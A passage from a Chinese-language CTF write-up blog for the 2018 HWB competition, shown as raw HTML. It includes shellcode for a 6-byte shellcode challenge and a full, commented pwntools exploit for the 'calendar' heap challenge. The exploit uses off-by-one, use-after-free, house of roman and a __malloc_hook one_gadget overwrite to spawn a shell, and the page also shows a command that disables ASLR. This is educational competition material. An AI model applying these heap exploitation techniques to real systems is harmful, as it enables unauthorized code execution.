  <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mi">8</span><span class="p">],</span> <span class="mi">6uLL</span><span class="p">);</span>
  <span class="n">dest</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mi">8</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFFFFFFF000LL</span><span class="p">),</span> <span class="mh">0x1000uLL</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span>
  <span class="n">stack</span> <span class="o">=</span> <span class="p">(</span><span class="kr">__int64</span><span class="p">)</span><span class="n">mmap</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">buf</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFFFFFFF000LL</span><span class="p">),</span> <span class="mh">0x1000uLL</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1280</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></td></tr></table>
</div>
</div><p>程序读取 6 个字节添加到一段 shellcode 之后，6 个字节要满足</p>
<ol>
<li>3 个奇数 opcode，3个偶数 opcode</li>
<li>各不相同</li>
</ol>
<p>程序给的 shellcode 为</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nl">.data:</span><span class="err">0000000000202020</span> <span class="c">; char sc[1]
</span><span class="c"></span><span class="nl">.data:</span><span class="err">0000000000202020</span> <span class="nl">sc:</span>                                     <span class="c">; DATA XREF: main+71↑o
</span><span class="c"></span><span class="nl">.data:</span><span class="err">0000000000202020</span>                                         <span class="c">; main+87↑o ...
</span><span class="c"></span><span class="nl">.data:</span><span class="err">0000000000202020</span>                 <span class="nf">mov</span>     <span class="no">rsp</span><span class="p">,</span> <span class="no">rdi</span>
<span class="nl">.data:</span><span class="err">0000000000202023</span>                 <span class="nf">xor</span>     <span class="no">rbp</span><span class="p">,</span> <span class="no">rbp</span>
<span class="nl">.data:</span><span class="err">0000000000202026</span>                 <span class="nf">xor</span>     <span class="no">rax</span><span class="p">,</span> <span class="no">rax</span>
<span class="nl">.data:</span><span class="err">0000000000202029</span>                 <span class="nf">xor</span>     <span class="no">rbx</span><span class="p">,</span> <span class="no">rbx</span>
<span class="nl">.data:</span><span class="err">000000000020202</span><span class="nf">C</span>                 <span class="no">xor</span>     <span class="no">rcx</span><span class="p">,</span> <span class="no">rcx</span>
<span class="nl">.data:</span><span class="err">000000000020202</span><span class="nf">F</span>                 <span class="no">xor</span>     <span class="no">rdx</span><span class="p">,</span> <span class="no">rdx</span>
<span class="nl">.data:</span><span class="err">0000000000202032</span>                 <span class="nf">xor</span>     <span class="no">rdi</span><span class="p">,</span> <span class="no">rdi</span>
<span class="nl">.data:</span><span class="err">0000000000202035</span>                 <span class="nf">xor</span>     <span class="no">rsi</span><span class="p">,</span> <span class="no">rsi</span>
<span class="nl">.data:</span><span class="err">0000000000202038</span>                 <span class="nf">xor</span>     <span class="no">r8</span><span class="p">,</span> <span class="no">r8</span>
<span class="nl">.data:</span><span class="err">000000000020203</span><span class="nf">B</span>                 <span class="no">xor</span>     <span class="no">r9</span><span class="p">,</span> <span class="no">r9</span>
<span class="nl">.data:</span><span class="err">000000000020203</span><span class="nf">E</span>                 <span class="no">xor</span>     <span class="no">r10</span><span class="p">,</span> <span class="no">r10</span>
<span class="nl">.data:</span><span class="err">0000000000202041</span>                 <span class="nf">xor</span>     <span class="no">r11</span><span class="p">,</span> <span class="no">r11</span>
<span class="nl">.data:</span><span class="err">0000000000202044</span>                 <span class="nf">xor</span>     <span class="no">r12</span><span class="p">,</span> <span class="no">r12</span>
<span class="nl">.data:</span><span class="err">0000000000202047</span>                 <span class="nf">xor</span>     <span class="no">r13</span><span class="p">,</span> <span class="no">r13</span>
<span class="nl">.data:</span><span class="err">000000000020204</span><span class="nf">A</span>                 <span class="no">xor</span>     <span class="no">r14</span><span class="p">,</span> <span class="no">r14</span>
<span class="nl">.data:</span><span class="err">000000000020204</span><span class="nf">D</span>                 <span class="no">xor</span>     <span class="no">r15</span><span class="p">,</span> <span class="no">r15</span>
</code></pre></td></tr></table>
</div>
</div><p>清空了除 <code>rsp</code> 和 <code>rip</code> 之外的所有通用寄存器，并且可以看出 rsp 被设置为了我们之前 mmap 的空间用来模拟栈</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nl">.text:</span><span class="err">0000000000000</span><span class="nf">C87</span>                 <span class="no">mov</span>     <span class="no">rdx</span><span class="p">,</span> <span class="no">cs</span><span class="p">:</span><span class="no">stack</span>
<span class="nl">.text:</span><span class="err">0000000000000</span><span class="nf">C8E</span>                 <span class="no">mov</span>     <span class="no">rax</span><span class="p">,</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_28</span><span class="p">]</span>
<span class="nl">.text:</span><span class="err">0000000000000</span><span class="nf">C92</span>                 <span class="no">mov</span>     <span class="no">rdi</span><span class="p">,</span> <span class="no">rdx</span>
<span class="nl">.text:</span><span class="err">0000000000000</span><span class="nf">C95</span>                 <span class="no">call</span>    <span class="no">rax</span>
</code></pre></td></tr></table>
</div>
</div><p>这样就可以通过 0 号系统调用，即 <code>sys_read</code> 来读取一部分内容了，很自然的想法是读到栈顶（</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-asm" data-lang="asm">    <span class="nf">read</span> <span class="err">=</span> <span class="no">asm</span><span class="p">(</span><span class="err">&#39;&#39;&#39;</span>
            <span class="nf">push</span> <span class="no">rsp</span>
            <span class="nf">pop</span> <span class="no">rsi</span>
            <span class="nf">mov</span> <span class="no">edx</span><span class="p">,</span> <span class="no">esi</span>
            <span class="nf">syscall</span>
            <span class="err">&#39;&#39;&#39;)</span>
    <span class="nf">assert</span> <span class="no">len</span><span class="p">(</span><span class="no">read</span><span class="p">)</span> <span class="err">&lt;</span> <span class="mi">7</span>
    <span class="nf">io.sendafter</span><span class="p">(</span><span class="err">&#34;</span><span class="no">shellcode</span><span class="p">:</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">read</span><span class="p">)</span>
</code></pre></td></tr></table>
</div>
</div><p>这段 shellcode 是符合要求的。</p>
<p>当两次 mmap 的距离比较近时，就可以通过第二次 read 来覆盖 shellcode，进而控制 rip。能控制 rip 的话，直接控制 rip 到我们写的 <code>execve(&quot;/bin/sh&quot;, 0, 0)</code> 即可。成功率不是 100% 但也相当可观了。</p>
<h2 id="calendar">calendar</h2>
<p>off-by-one 和 uaf 的漏洞很容易发现，关键就在没有 leak，主办方也提示了使用 <code>house of roman</code> 这种方法。</p>
<p>和原始的 <a href="https://gist.github.com/romanking98/9aab2804832c0fb46615f025e8ffb0bc">house of roman</a> 不同的是，这里不能直接 malloc 出在 unsorted bin 范围内的 chunk，但因为有 off-by-one，这个不是问题，通过 off-by-one 伪造 size 即可。</p>
<p>另外这道题目当时没给 libc，但可以使用其他题目的 libc，姿势来自 muhe 师傅分享过的一个 <a href="https://github.com/bash-c/slides/blob/master/pwn_others/pwn_by_muhe.pptx">ppt</a>
<img src="http://ww1.sinaimg.cn/large/006AWYXBly1fwh3uwvdlmj30qp061ab5.jpg" alt=""></p>
<p>另外调试的时候可以关闭本地的 aslr。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-bash" data-lang="bash"><span class="c1"># echo 0 &gt; /proc/sys/kernel/randomize_va_space</span>
</code></pre></td></tr></table>
</div>
</div><p>最后贴一下我的 exp，写了注释</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">  1
</span><span class="lnt">  2
</span><span class="lnt">  3
</span><span class="lnt">  4
</span><span class="lnt">  5
</span><span class="lnt">  6
</span><span class="lnt">  7
</span><span class="lnt">  8
</span><span class="lnt">  9
</span><span class="lnt"> 10
</span><span class="lnt"> 11
</span><span class="lnt"> 12
</span><span class="lnt"> 13
</span><span class="lnt"> 14
</span><span class="lnt"> 15
</span><span class="lnt"> 16
</span><span class="lnt"> 17
</span><span class="lnt"> 18
</span><span class="lnt"> 19
</span><span class="lnt"> 20
</span><span class="lnt"> 21
</span><span class="lnt"> 22
</span><span class="lnt"> 23
</span><span class="lnt"> 24
</span><span class="lnt"> 25
</span><span class="lnt"> 26
</span><span class="lnt"> 27
</span><span class="lnt"> 28
</span><span class="lnt"> 29
</span><span class="lnt"> 30
</span><span class="lnt"> 31
</span><span class="lnt"> 32
</span><span class="lnt"> 33
</span><span class="lnt"> 34
</span><span class="lnt"> 35
</span><span class="lnt"> 36
</span><span class="lnt"> 37
</span><span class="lnt"> 38
</span><span class="lnt"> 39
</span><span class="lnt"> 40
</span><span class="lnt"> 41
</span><span class="lnt"> 42
</span><span class="lnt"> 43
</span><span class="lnt"> 44
</span><span class="lnt"> 45
</span><span class="lnt"> 46
</span><span class="lnt"> 47
</span><span class="lnt"> 48
</span><span class="lnt"> 49
</span><span class="lnt"> 50
</span><span class="lnt"> 51
</span><span class="lnt"> 52
</span><span class="lnt"> 53
</span><span class="lnt"> 54
</span><span class="lnt"> 55
</span><span class="lnt"> 56
</span><span class="lnt"> 57
</span><span class="lnt"> 58
</span><span class="lnt"> 59
</span><span class="lnt"> 60
</span><span class="lnt"> 61
</span><span class="lnt"> 62
</span><span class="lnt"> 63
</span><span class="lnt"> 64
</span><span class="lnt"> 65
</span><span class="lnt"> 66
</span><span class="lnt"> 67
</span><span class="lnt"> 68
</span><span class="lnt"> 69
</span><span class="lnt"> 70
</span><span class="lnt"> 71
</span><span class="lnt"> 72
</span><span class="lnt"> 73
</span><span class="lnt"> 74
</span><span class="lnt"> 75
</span><span class="lnt"> 76
</span><span class="lnt"> 77
</span><span class="lnt"> 78
</span><span class="lnt"> 79
</span><span class="lnt"> 80
</span><span class="lnt"> 81
</span><span class="lnt"> 82
</span><span class="lnt"> 83
</span><span class="lnt"> 84
</span><span class="lnt"> 85
</span><span class="lnt"> 86
</span><span class="lnt"> 87
</span><span class="lnt"> 88
</span><span class="lnt"> 89
</span><span class="lnt"> 90
</span><span class="lnt"> 91
</span><span class="lnt"> 92
</span><span class="lnt"> 93
</span><span class="lnt"> 94
</span><span class="lnt"> 95
</span><span class="lnt"> 96
</span><span class="lnt"> 97
</span><span class="lnt"> 98
</span><span class="lnt"> 99
</span><span class="lnt">100
</span><span class="lnt">101
</span><span class="lnt">102
</span><span class="lnt">103
</span><span class="lnt">104
</span><span class="lnt">105
</span><span class="lnt">106
</span><span class="lnt">107
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span>
<span class="c1"># -*- coding: utf-8 -*-</span>

<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">time</span> <span class="kn">import</span> <span class="n">sleep</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="n">elfPath</span> <span class="o">=</span> <span class="s2">&#34;./task_calendar&#34;</span>
<span class="n">libcPath</span> <span class="o">=</span> <span class="s2">&#34;./libc.so.6&#34;</span>
<span class="n">remoteAddr</span> <span class="o">=</span> <span class="s2">&#34;117.78.26.133&#34;</span>
<span class="n">remotePort</span> <span class="o">=</span> <span class="mi">31666</span>

<span class="n">context</span><span class="o">.</span><span class="n">binary</span> <span class="o">=</span> <span class="n">elfPath</span>
<span class="n">elf</span> <span class="o">=</span> <span class="n">context</span><span class="o">.</span><span class="n">binary</span>
<span class="c1">#  if sys.argv[1] == &#34;l&#34;:</span>
    <span class="c1">#  io = process(elfPath, timeout = 5)</span>
    <span class="c1">#  libc = elf.libc</span>

<span class="c1">#  else:</span>
    <span class="c1">#  if sys.argv[1] == &#34;d&#34;:</span>
        <span class="c1">#  io = process(elfPath, env = {&#34;LD_PRELOAD&#34;: libcPath})</span>
    <span class="c1">#  else:</span>
        <span class="c1">#  io = remote(remoteAddr, remotePort, timeout = 5)</span>
    <span class="c1">#  if libcPath:</span>
        <span class="c1">#  libc = ELF(libcPath)</span>

<span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span>
<span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s2">&#34;deepin-terminal&#34;</span><span class="p">,</span> <span class="s2">&#34;-x&#34;</span><span class="p">,</span> <span class="s2">&#34;sh&#34;</span><span class="p">,</span> <span class="s2">&#34;-c&#34;</span><span class="p">]</span>
<span class="n">success</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">name</span><span class="p">,</span> <span class="n">value</span><span class="p">:</span> <span class="n">log</span><span class="o">.</span><span class="n">success</span><span class="p">(</span><span class="s2">&#34;{} -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">value</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">DEBUG</span><span class="p">():</span>
    <span class="n">base</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="s2">&#34;pmap {}| awk &#39;{{print $1}}&#39;&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">pid</span><span class="p">))</span><span class="o">.</span><span class="n">readlines</span><span class="p">()[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">16</span><span class="p">)</span>
    <span class="n">info</span><span class="p">(</span><span class="s2">&#34;edit -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="mh">0xEC8</span> <span class="o">+</span> <span class="n">base</span><span class="p">))</span>
    <span class="n">info</span><span class="p">(</span><span class="s2">&#34;free -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="mh">0xF0B</span> <span class="o">+</span> <span class="n">base</span><span class="p">))</span>
    <span class="n">info</span><span class="p">(</span><span class="s2">&#34;malloc -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="mh">0xDC6</span> <span class="o">+</span> <span class="n">base</span><span class="p">))</span>
    <span class="nb">raw_input</span><span class="p">(</span><span class="s2">&#34;DEBUG: &#34;</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span>
    <span class="k">assert</span> <span class="mi">1</span> <span class="o">&lt;=</span> <span class="n">idx</span> <span class="o">&lt;=</span> <span class="mi">4</span>
    <span class="k">assert</span> <span class="mi">0</span> <span class="o">&lt;=</span> <span class="n">size</span> <span class="o">&lt;=</span> <span class="mh">0x68</span>
    <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice&gt; &#34;</span><span class="p">,</span> <span class="s2">&#34;1&#34;</span><span class="p">)</span>
    <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice&gt; &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span>
    <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;size&gt; &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">size</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">edit</span><span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">info</span><span class="p">):</span>
    <span class="k">assert</span> <span class="mi">1</span> <span class="o">&lt;=</span> <span class="n">idx</span> <span class="o">&lt;=</span> <span class="mi">4</span>
    <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice&gt; &#34;</span><span class="p">,</span> <span class="s2">&#34;2&#34;</span><span class="p">)</span>
    <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice&gt; &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span>
    <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;size&gt; &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">size</span><span class="p">))</span>
    <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;info&gt; &#34;</span><span class="p">,</span> <span class="n">info</span><span class="p">)</span>
    <span class="n">sleep</span><span class="p">(</span><span class="mf">0.01</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">delete</span><span class="p">(</span><span class="n">idx</span><span class="p">):</span>
    <span class="k">assert</span> <span class="mi">1</span> <span class="o">&lt;=</span> <span class="n">idx</span> <span class="o">&lt;=</span> <span class="mi">4</span>
    <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice&gt; &#34;</span><span class="p">,</span> <span class="s2">&#34;3&#34;</span><span class="p">)</span>
    <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice&gt; &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span>

<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span>
    <span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
        <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="n">elfPath</span><span class="p">,</span> <span class="n">timeout</span> <span class="o">=</span> <span class="mi">5</span><span class="p">)</span>
        <span class="n">libc</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">libc</span>
        <span class="c1">#  io = remote(remoteAddr, remotePort, timeout = 5)</span>
        <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;name&gt; &#34;</span><span class="p">,</span> <span class="s2">&#34;m4x&#34;</span><span class="p">)</span>
        <span class="n">add</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span>
        <span class="n">add</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span>
        <span class="n">add</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span>
        <span class="c1"># forge unsorted bin</span>
        <span class="n">edit</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mh">0x60</span><span class="p">,</span> <span class="n">flat</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="mh">0x51</span><span class="p">)</span> <span class="o">+</span> <span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span>
        <span class="n">edit</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">,</span> <span class="s1">&#39;0&#39;</span> <span class="o">*</span> <span class="mh">0x68</span> <span class="o">+</span> <span class="s1">&#39;</span><span class="se">\x91</span><span class="s1">&#39;</span><span class="p">)</span>
        <span class="n">delete</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="c1"># chunk2 -&gt; main_arena + 88</span>
    
        <span class="n">edit</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">,</span> <span class="s1">&#39;1&#39;</span> <span class="o">*</span> <span class="mh">0x68</span> <span class="o">+</span> <span class="s1">&#39;</span><span class="se">\x71</span><span class="s1">&#39;</span><span class="p">)</span>
        <span class="n">delete</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="c1"># chunk1</span>
        <span class="n">delete</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span> <span class="c1"># chunk3 -&gt; chunk1</span>
        <span class="n">edit</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\x70\x70</span><span class="s1">&#39;</span><span class="p">)</span> <span class="c1"># chunk3 -&gt; chunk2 -&gt; main_arena + 88</span>
        <span class="n">edit</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\xfd\x1a</span><span class="s1">&#39;</span><span class="p">)</span> <span class="c1"># chunk3 -&gt; chunk2 -&gt; __malloc_hook - 0x13 -&gt; 0x7f</span>
    
        <span class="n">add</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span> <span class="c1"># chunk2 -&gt; __malloc_hook - 0x13 -&gt; 0x7f</span>
        <span class="n">add</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span> <span class="c1"># __malloc_hook - 0x13 -&gt; 0x7f</span>
        <span class="n">add</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span> <span class="c1"># 0x7f</span>
        <span class="n">delete</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span> <span class="c1"># chunk4 -&gt; 0x7f</span>
        <span class="n">edit</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> <span class="c1"># chunk4</span>
    
        <span class="c1"># unsorted bin attack</span>
        <span class="n">add</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span>
        <span class="n">edit</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="n">flat</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\0</span><span class="s1">&#39;</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\x1b</span><span class="s1">&#39;</span><span class="p">))</span>
        <span class="n">add</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span>
    
        <span class="c1"># partial overwrite</span>
        <span class="c1">#  DEBUG() </span>
        <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;one_gadget&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xf02a4</span>
        <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">=</span> <span class="mh">0x7ffff7a0d000</span>
        <span class="n">info</span><span class="p">(</span><span class="s2">&#34;one_gadget -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;one_gadget&#39;</span><span class="p">]))</span>
        <span class="n">edit</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\0\0\0</span><span class="s1">&#39;</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;one_gadget&#39;</span><span class="p">])[:</span> <span class="mi">3</span><span class="p">])</span>
    
        <span class="c1"># trigger one_gadget</span>
        <span class="n">delete</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span>
        <span class="n">delete</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span>
        
        <span class="k">try</span><span class="p">:</span>
            <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;echo ABCDEFG&#34;</span><span class="p">)</span>
            <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;ABCDEFG&#34;</span><span class="p">)</span>
            <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;ls&#34;</span><span class="p">)</span>
            <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span>
        <span class="k">except</span><span class="p">:</span>
            <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</code></pre></td></tr></table>
</div>
</div><p>再贴一下其他师父这道题目的 wp</p>
<p><a href="http://p4nda.top/2018/10/14/hwb-ctf-2018/#calendar">http://p4nda.top/2018/10/14/hwb-ctf-2018/#calendar</a></p>
<p><a href="https://veritas501.space/2018/10/15/">https://veritas501.space/2018/10/15/</a>护网杯%20pwn%20wp/</p>
<p><a href="https://www.anquanke.com/post/id/162121">https://www.anquanke.com/post/id/162121</a></p>
<p>以及 house of roman 的参考</p>
<p><a href="https://www.anquanke.com/post/id/162121">https://www.anquanke.com/post/id/162121</a></p>
    </div>

    
    


    
    

    <footer class="post-footer">
      <div class="post-tags">
          <a href="https://bash-c.github.io/tags/pwn/">pwn</a>
          
        </div>

      
      <nav class="post-nav">
        
          <a class="prev" href="/post/dive-into-tcache/">
            
            <i class="iconfont">
              <svg  class="icon" viewBox="0 0 1024 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="18" height="18">
  <path d="M691.908486 949.511495l75.369571-89.491197c10.963703-12.998035 10.285251-32.864502-1.499144-44.378743L479.499795 515.267417 757.434875 204.940602c11.338233-12.190647 11.035334-32.285311-0.638543-44.850487l-80.46666-86.564541c-11.680017-12.583596-30.356378-12.893658-41.662889-0.716314L257.233596 494.235404c-11.332093 12.183484-11.041474 32.266891 0.657986 44.844348l80.46666 86.564541c1.772366 1.910513 3.706415 3.533476 5.750981 4.877077l306.620399 321.703933C662.505829 963.726242 680.945807 962.528973 691.908486 949.511495z"></path>
</svg>

            </i>
            <span class="prev-text nav-default">Dive Into Tcache</span>
            <span class="prev-text nav-mobile">Prev</span>
          </a>
        
          <a class="next" href="/post/linux-kernel-pwn-abc-2/">
            <span class="next-text nav-default">Linux Kernel Pwn ABC(II)</span>
            <span class="prev-text nav-mobile">Next</span>
            
            <i class="iconfont">
              <svg class="icon" viewBox="0 0 1024 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="18" height="18">
  <path d="M332.091514 74.487481l-75.369571 89.491197c-10.963703 12.998035-10.285251 32.864502 1.499144 44.378743l286.278095 300.375162L266.565125 819.058374c-11.338233 12.190647-11.035334 32.285311 0.638543 44.850487l80.46666 86.564541c11.680017 12.583596 30.356378 12.893658 41.662889 0.716314l377.434212-421.426145c11.332093-12.183484 11.041474-32.266891-0.657986-44.844348l-80.46666-86.564541c-1.772366-1.910513-3.706415-3.533476-5.750981-4.877077L373.270379 71.774697C361.493148 60.273758 343.054193 61.470003 332.091514 74.487481z"></path>
</svg>

            </i>
          </a>
      </nav>
    </footer>
  </article>

  
  

  
  

  

  
  
    <div class="post bg-white">
      <script src="https://utteranc.es/client.js"
            repo= "bash-c/bash-c.github.io"
            issue-term="pathname"
            theme="github-light"
            crossorigin="anonymous"
            async>
      </script>
    </div>
  

  

  

  

    

  

        </div>
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="icon-links">
  
  
    <a href="mailto:aboultraman@gmail.com" rel="me noopener" class="iconfont"
      title="email" >
      <svg class="icon" viewBox="0 0 1451 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="36" height="36">
